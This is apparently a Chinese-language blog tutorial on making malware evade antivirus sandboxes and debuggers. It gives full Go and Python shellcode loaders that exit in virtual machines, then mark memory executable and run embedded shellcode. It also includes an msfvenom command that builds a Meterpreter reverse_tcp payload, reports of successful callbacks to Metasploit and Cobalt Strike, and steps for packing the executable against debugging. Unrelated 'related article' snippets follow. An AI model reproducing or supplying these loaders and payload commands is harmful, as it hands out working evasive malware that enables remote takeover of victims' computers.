免杀对抗-反沙盒+反调试
反VT-沙盒检测-Go&Python
介绍:
近年来,各类恶意软件层出不穷,反病毒软件也更新了各种检测方案以提高检率。
其中比较有效的方案是动态沙箱检测技术,即通过在沙箱中运行程序并观察程序行为来判断程序是否为恶意程序。简单来说沙盒就是为运行中的程序提供的隔离环境。
为了逃避沙箱/安全人员的检测,恶意软件使用了各类识别沙箱/虚拟机的技术,用于判断自身程序是否运行在沙箱/虚拟机中。
go语言
1.使用GoLang打开如下反沙盒go文件。
main.go:会检测电脑配置来判断是否是虚拟环境
packagemainimport("encoding/hex""golang.org/x/sys/windows""os""os/exec""path/filepath""runtime""strings""syscall""time""unsafe")//检测语言,依赖windows数据包,编译后会增加0.6M大小funccheck_language(){a,_:=windows.GetUserPreferredUILanguages(windows.MUI_LANGUAGE_NAME)//获取当前系统首选语言ifa[0]!="zh-CN"{os.Exit(1)}}funccheck_sandbox(){//1.延时运行timeSleep1,_:=timeSleep()//2.检测开机时间bootTime1,_:=bootTime()//3.检测物理内存physicalMemory1,_:=physicalMemory()//4.检测CPU核心数numberOfCPU1,_:=numberOfCPU()//5.检测临时文件数numberOfTempFiles1,_:=numberOfTempFiles()level:=timeSleep1+bootTime1+physicalMemory1+numberOfCPU1+numberOfTempFiles1//有五个等级,等级越趋向于5,越像真机//fmt.Println("level:",level)iflevel<4{os.Exit(1)}}//1.延时运行functimeSleep()(int,error){startTime:=time.Now()time.Sleep(5*time.Second)endTime:=time.Now()sleepTime:=endTime.Sub(startTime)ifsleepTime>=time.Duration(5*time.Second){//fmt.Println("睡眠时间为:",sleepTime)return1,nil}else{return0,nil}}//2.检测开机时间//许多沙箱检测完毕后会重置系统,我们可以检测开机时间来判断是否为真实的运行状况。funcbootTime()(int,error){varkernel=syscall.NewLazyDLL("Kernel32.dll")GetTickCount:=kernel.NewProc("GetTickCount")r,_,_:=GetTickCount.Call()ifr==0{return0,nil}ms:=time.Duration(r*1000*1000)tm:=time.Duration(30*time.Minute)//fmt.Println(ms,tm)ifms<tm{return0,nil}else{return1,nil}}//3、物理内存大小funcphysicalMemory()(int,error){varmod=syscall.NewLazyDLL("kernel32.dll")varproc=mod.NewProc("GetPhysicallyInstalledSystemMemory")varmemuint64proc.Call(uintptr(unsafe.Pointer(&mem)))mem=mem/1048576//fmt.Printf("物理内存为%dG\n",mem)ifmem<4{return0,nil//小于4GB返回0}return1,nil//大于4GB返回1}funcnumberOfCPU()(int,error){a:=runtime.NumCPU()//fmt.Println("CPU核心数为:",a)ifa<4{return0,nil//小于4核心数,返回0}else{return1,nil//大于4核心数,返回1}}funcnumberOfTempFiles()(int,error){conn:=os.Getenv("temp")//通过环境变量读取temp文件夹路径varkintifconn==""{//fmt.Println("未找到temp文件夹,或temp文件夹不存在")return0,nil}else{local_dir:=connerr:=filepath.Walk(local_dir,func(filenamestring,fios.FileInfo,errerror)error{iffi.IsDir(){returnnil}k++//fmt.Println("filename:",filename)//输出文件名字returnnil})//fmt.Println("Temp总共文件数量:",k)iferr!=nil{//fmt.Println("路径获取错误")return0,nil}}ifk<30{return0,nil}return1,nil}funccheck_virtual()(bool,error){//识别虚拟机model:=""varcmd*exec.Cmdcmd=exec.Command("cmd","/C","wmicpathWin32_ComputerSystemgetModel")stdout,err:=cmd.Output()iferr!=nil{returnfalse,err}model=strings.ToLower(string(stdout))ifstrings.Contains(model,"VirtualBox")||strings.Contains(model,"virtual")||strings.Contains(model,"VMware")||strings.Contains(model,"KVM")||strings.Contains(model,"Bochs")||strings.Contains(model,"HVMdomU")||strings.Contains(model,"Parallels"){returntrue,nil//如果是虚拟机则返回true}returnfalse,nil}funcPathExists(pathstring)(bool,error){_,err:=os.Stat(path)iferr==nil{returntrue,nil}ifos.IsNotExist(err){returnfalse,nil}returnfalse,err}funcfack(pathstring){b,_:=PathExists(path)ifb{os.Exit(1)}}funccheck_file(){fack("C:\\windows\\System32\\Drivers\\Vmmouse.sys")fack("C:\\windows\\System32\\Drivers\\vmtray.dll")fack("C:\\windows\\System32\\Drivers\\VMToolsHook.dll")fack("C:\\windows\\System32\\Drivers\\vmmousever.dll")fack("C:\\windows\\System32\\Drivers\\vmhgfs.dll")fack("C:\\windows\\System32\\Drivers\\vmGuestLib.dll")fack("C:\\windows\\System32\\Drivers\\VBoxMouse.sys")fack("C:\\windows\\System32\\Drivers\\VBoxGuest.sys")fack("C:\\windows\\System32\\Drivers\\VBoxSF.sys")fack("C:\\windows\\System32\\Drivers\\VBoxVideo.sys")fack("C:\\windows\\System32\\vboxdisp.dll")fack("C:\\windows\\System32\\vboxhook.dll")fack("C:\\windows\\System32\\vboxoglerrorspu.dll")fack("C:\\windows\\System32\\vboxoglpassthroughspu.dll")fack("C:\\windows\\System32\\vboxservice.exe")fack("C:\\windows\\System32\\vboxtray.exe")fack("C:\\windows\\System32\\VBoxControl.exe")}varVirtualAlloc=syscall.NewLazyDLL("kernel32.dll").NewProc("VirtualProtect")funcaaa(aunsafe.Pointer,buintptr,cuint32,dunsafe.Pointer)bool{ret,_,_:=VirtualAlloc.Call(uintptr(a),uintptr(b),uintptr(c),uintptr(d))returnret>0}funcRun(sc[]byte){fly:=func(){}varxxuint32if!aaa(unsafe.Pointer(*(**uintptr)(unsafe.Pointer(&fly))),unsafe.Sizeof(uintptr(0)),uint32(0x40),unsafe.Pointer(&xx)){}**(**uintptr)(unsafe.Pointer(&fly))=*(*uintptr)(unsafe.Pointer(&sc))varyyuint32aaa(unsafe.Pointer(*(*uintptr)(unsafe.Pointer(&sc))),uintptr(len(sc)),uint32(0x40),unsafe.Pointer(&yy))fly()}funcScFromHex(scHexstring)[]byte{varcharcode[]bytecharcode,_=hex.DecodeString(string(scHex))returncharcode}funcmain(){check_language()check_file()check,_:=check_virtual()ifcheck==true{os.Exit(1)}check_sandbox()sccode:=ScFromHex("生成的hex类型shellcode")Run(sccode)}2.启动msf,使用命令生成hex类型shellcode
命令:msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=监听ip LPORT=4444 -f hex
将shellcode写入main.go文件中,运行生成exe程序
3.msf设置监听,在真机运行exe程序,msf成功上线
4.将exe程序放到虚拟机中无法运行,证明代码成功检测出当前处在虚拟环境中。
python语言
1.将如下反沙盒py代码使用py文件打包器打包成exe程序
Vt.py:
import ctypes,base64,os,psutil,timefrom multiprocessing import cpu_countdef check_file():vmfile=['C:\windows\System32\Drivers\Vmmouse.sys','C:\windows\System32\Drivers/vmtray.dll','C:\windows\System32\Drivers\VMToolsHook.dll','C:\windows\System32\Drivers/vmmousever.dll','C:\windows\System32\Drivers/vmhgfs.dll','C:\windows\System32\Drivers/vmGuestLib.dll','C:\windows\System32\Drivers\VBoxMouse.sys','C:\windows\System32\Drivers\VBoxGuest.sys','C:\windows\System32\Drivers\VBoxSF.sys','C:\windows\System32\Drivers\VBoxVideo.sys','C:\windows\System32/vboxdisp.dll','C:\windows\System32/vboxhook.dll','C:\windows\System32/vboxoglerrorspu.dll','C:\windows\System32/vboxoglpassthroughspu.dll','C:\windows\System32/vboxservice.exe','C:\windows\System32/vboxtray.exe','C:\windows\System32\VBoxControl.exe',]for data in vmfile:result=os.path.exists(data)if result:return 0return 1def check_virtual():r=os.popen('wmic path Win32_ComputerSystem get Model')text = r.read()if 'vmware' in text:return 0return 1def numberOfCPU():if int(format(cpu_count())) < 4:return 0return 1def physicalMemory():data = psutil.virtual_memory()total = data.total # 总内存,单位为byten=int(total/1024/1024/1024)+1if n < 4:return 0return 1if __name__ == '__main__':r=numberOfCPU()+physicalMemory()+check_virtual()+check_file()print(r)if r < 4:exit()else:sc=b'生成的shellcode'time.sleep(1)ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_uint64rwxpage = ctypes.windll.kernel32.VirtualAlloc(0, len(sc), 0x1000, 0x40)time.sleep(1)ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_uint64(rwxpage), ctypes.create_string_buffer(sc), len(sc))time.sleep(1)handle = ctypes.windll.kernel32.CreateThread(0, 0, ctypes.c_uint64(rwxpage), 0, 0, 0)time.sleep(1)ctypes.windll.kernel32.WaitForSingleObject(handle, -1)time.sleep(1)打包成功
2.真机运行exe程序,cs成功上线
3.将exe程序上传到虚拟机,exe程序无法运行。
反VT反调试-程序保护
1.将上线的exe程序使用ollydbg进行调试,可以正常调试
2.使用工具shielden对exe程序进行保护
下载:https://www.somode.com/softxz/716.html
启动工具,将exe程序拖入工具中。勾选如下选项,点击保护
3.将重新生成的受保护的exe程序再次使用ollydbg调试,可以看到已经不能正常调试了
4.在虚拟机中也无法在运行
相关文章:
免杀对抗-反沙盒+反调试
反VT-沙盒检测-Go&Python 介绍: 近年来,各类恶意软件层出不穷,反病毒软件也更新了各种检测方案以提高检率。 其中比较有效的方案是动态沙箱检测技术,即通过在沙箱中运行程序并观察程序行为来判断程序是否为恶意程序。简单来说…...
QTimer类的使用方法
本文介绍QTimer类的使用方法。 1.单次触发 在某些情况下,定时器只运行一次,可使用单次触发方式。 QTimer *timer new QTimer(this); connect(timer, &QTimer::timeout, this, &MainWindow::timeout); timer->setSingleShot(true); timer-…...
行为模式:9、空对象模式(Null Object Pattern)(C++示例))
(三)行为模式:9、空对象模式(Null Object Pattern)(C++示例)
目录 1、空对象模式(Null Object Pattern)含义 2、空对象模式的主要涉及以下几个角色 3、空对象模式的应用场景 4、空对象模式的优缺点 (1)优点 (2)缺点 5、C实现空对象模式的实例 1、空对象模式&am…...
Django实战项目-学习任务系统-用户登录
第一步:先创建一个Django应用程序框架代码 1,先创建一个Django项目 django-admin startproject mysite将创建一个目录,其布局如下:mysite/manage.pymysite/__init__.pysettings.pyurls.pyasgi.pywsgi.py 2,再创建一个…...
【动手学深度学习-Pytorch版】Transformer代码总结
本文是纯纯的撸代码讲解,没有任何Transformer的基础内容~ 是从0榨干Transformer代码系列,借用的是李沐老师上课时讲解的代码。 本文是根据每个模块的实现过程来进行讲解的。如果您想获取关于Transformer具体的实现细节(不含代码)可…...
做外贸独立站选Shopify还是WordPress?
现在确实会有很多新人想做独立站,毕竟跨境电商平台内卷严重,平台规则限制不断升级,脱离平台“绑架”布局独立站,才能获得更多流量、订单、塑造品牌价值。然而,在选择建立外贸独立站的过程中,选择适合的建站…...
echarts的bug,在series里写tooltip,不起作用,要在全局先写tooltip:{}才起作用,如果在series里写的不起作用就写到全局里
echarts的bug,在series里写tooltip,不起作用,要在全局先写tooltip:{show:true}才起作用,如果在series里写的不起作用就写到全局里 series里写tooltip不起作用,鼠标悬浮在echarts图表上时不显示提示 你需要…...
jmeter分布式压测
一、什么是压力测试? 压力测试(Stress Test),也称为强度测试、负载测试,属于性能测试的范畴。 压力测试是模拟实际应用的软硬件环境及用户使用过程的系统负荷,长时间或超大负荷地运行被测软件系统ÿ…...
consulmanage部署
一、部署consul 使用yum方式部署consul yum install -y yum-utils yum-config-manager --add-repo https://rpm.releases.hashicorp.com/RHEL/hashicorp.repo yum -y install consul 执行以下命令获取uuid密钥并记录下来 uuidgen 编辑consul配置文件 vi /etc/consul.d/consul.h…...
大数据软件项目的验收流程
大数据软件项目的验收流程是确保项目交付符合预期需求和质量标准的关键步骤。以下是一般的大数据软件项目验收流程,希望对大家有所帮助。北京木奇移动技术有限公司,专业的软件外包开发公司,欢迎交流合作。 1.项目验收计划制定: 在…...
《第一行代码Andorid》阅读笔记-第一章
这篇文章是我自己的《第一行代码Andorid》的阅读笔记,虽然大量参考了别人已经写好的一些笔记和代码但是也有自己的提炼和新的问题在里面,我也会放上参考文章链接。 学习重点 Android系统的四大组件: (1)活动ÿ…...
(VP))
Educational Codeforces Round 146 (Rated for Div. 2)(VP)
写个题解 A. Coins void solve(){ll n, k; cin >> n >> k;bl ok true;if (n &1 && k %2 0) ok false;print(ok ? yes : no); } B. Long Legs void solve(){db x, y; cin >> x >> y;if (x < y) swap(x, y);int t1 ceil(sqrt(x))…...
9.30国庆
消息队列完成进程间通信 #include <myhead.h>#define size sizeof(msg_ds)-sizeof(long) //正文大小//消息结构体 typedef struct {long msgtype; //消息类型char data[1024]; //消息正文 }msg_ds;//创建子线程构造体 void *task1(void *arg) {//创造第二个key值ke…...
java基础-第4章-面向对象(二)
一、static关键字 静态(static)可以修饰属性和方法。 称为静态属性(类属性)、静态方法(类方法)。 静态成员是全类所有对象共享的成员。 在全类中只有一份,不因创建多个对象而产生多份。 不必创…...
flex加 grid 布局笔记
<style> .flex-container { display: flex; height: 100%; /* 设置容器的高度 */ } .wide { display: flex; padding: 10px; border: 1px solid lightgray; text-align: center; justify-content: …...
最高评级!华为云CodeArts Board获信通院软件研发效能度量平台先进级认证
9月26日,华为云CodeArts Board获得了中国信通院《云上软件研发效能度量分级模型》的先进级最高级评估,达到了软件研发效能度量平台评估的通用效能度量能力、组织效能模型、项目效能模型、资源效能模型、个人效能模型、研发效能评价模型、项目管理域、开发…...
图像上传功能实现
一、后端 文件存放在images.path路径下 package com.like.common;import jakarta.servlet.ServletOutputStream; import jakarta.servlet.http.HttpServletResponse; import org.springframework.beans.factory.annotation.Value; import org.springframework.web.bind.annot…...
03_Node.js模块化开发
1 Node.js的基本使用 1.1 NPM nodejs安装完成后,会跟随着自动安装另外一个工具npm。 NPM的全称是Node Package Manager,是一个NodeJS包管理和分发工具,已经成为了非官方的发布Node模块(包)的标准。 2020年3月17日&…...
Nginx支持SNI证书,已经ssl_server_name的使用
整理了一些网上的资料,这里记录一下,供大家参考 什么是SNI? 传统的应用场景中,一台服务器对应一个IP地址,一个域名,使用一张包含了域名信息的证书。随着云计算技术的普及,在云中的虚拟机有了一…...
Hive【Hive(六)窗口函数】
窗口函数(window functions) 概述 定义 窗口函数能够为每行数据划分 一个窗口,然后对窗口范围内的数据进行计算,最后将计算结果返回给该行数据。 语法 窗口函数的语法主要包括 窗口 和 函数 两个部分。其中窗口用于定义计算范围…...
web vue 项目 Docker化部署
Web 项目 Docker 化部署详细教程 目录 Web 项目 Docker 化部署概述Dockerfile 详解 构建阶段生产阶段 构建和运行 Docker 镜像 1. Web 项目 Docker 化部署概述 Docker 化部署的主要步骤分为以下几个阶段: 构建阶段(Build Stage):…...
超短脉冲激光自聚焦效应
前言与目录 强激光引起自聚焦效应机理 超短脉冲激光在脆性材料内部加工时引起的自聚焦效应,这是一种非线性光学现象,主要涉及光学克尔效应和材料的非线性光学特性。 自聚焦效应可以产生局部的强光场,对材料产生非线性响应,可能…...
python/java环境配置
环境变量放一起 python: 1.首先下载Python Python下载地址:Download Python | Python.org downloads ---windows -- 64 2.安装Python 下面两个,然后自定义,全选 可以把前4个选上 3.环境配置 1)搜高级系统设置 2…...
2.Vue编写一个app
1.src中重要的组成 1.1main.ts // 引入createApp用于创建应用 import { createApp } from "vue"; // 引用App根组件 import App from ./App.vue;createApp(App).mount(#app)1.2 App.vue 其中要写三种标签 <template> <!--html--> </template>…...
)
postgresql|数据库|只读用户的创建和删除(备忘)
CREATE USER read_only WITH PASSWORD 密码 -- 连接到xxx数据库 \c xxx -- 授予对xxx数据库的只读权限 GRANT CONNECT ON DATABASE xxx TO read_only; GRANT USAGE ON SCHEMA public TO read_only; GRANT SELECT ON ALL TABLES IN SCHEMA public TO read_only; GRANT EXECUTE O…...
JUC笔记(上)-复习 涉及死锁 volatile synchronized CAS 原子操作
一、上下文切换 即使单核CPU也可以进行多线程执行代码,CPU会给每个线程分配CPU时间片来实现这个机制。时间片非常短,所以CPU会不断地切换线程执行,从而让我们感觉多个线程是同时执行的。时间片一般是十几毫秒(ms)。通过时间片分配算法执行。…...
自然语言处理——循环神经网络
自然语言处理——循环神经网络 循环神经网络应用到基于机器学习的自然语言处理任务序列到类别同步的序列到序列模式异步的序列到序列模式 参数学习和长程依赖问题基于门控的循环神经网络门控循环单元(GRU)长短期记忆神经网络(LSTM)…...
并发编程 - go版
1.并发编程基础概念 进程和线程 A. 进程是程序在操作系统中的一次执行过程,系统进行资源分配和调度的一个独立单位。B. 线程是进程的一个执行实体,是CPU调度和分派的基本单位,它是比进程更小的能独立运行的基本单位。C.一个进程可以创建和撤销多个线程;同一个进程中…...
从 GreenPlum 到镜舟数据库:杭银消费金融湖仓一体转型实践
作者:吴岐诗,杭银消费金融大数据应用开发工程师 本文整理自杭银消费金融大数据应用开发工程师在StarRocks Summit Asia 2024的分享 引言:融合数据湖与数仓的创新之路 在数字金融时代,数据已成为金融机构的核心竞争力。杭银消费金…...
[论文阅读]TrustRAG: Enhancing Robustness and Trustworthiness in RAG
TrustRAG: Enhancing Robustness and Trustworthiness in RAG [2501.00879] TrustRAG: Enhancing Robustness and Trustworthiness in Retrieval-Augmented Generation 代码:HuichiZhou/TrustRAG: Code for "TrustRAG: Enhancing Robustness and Trustworthin…...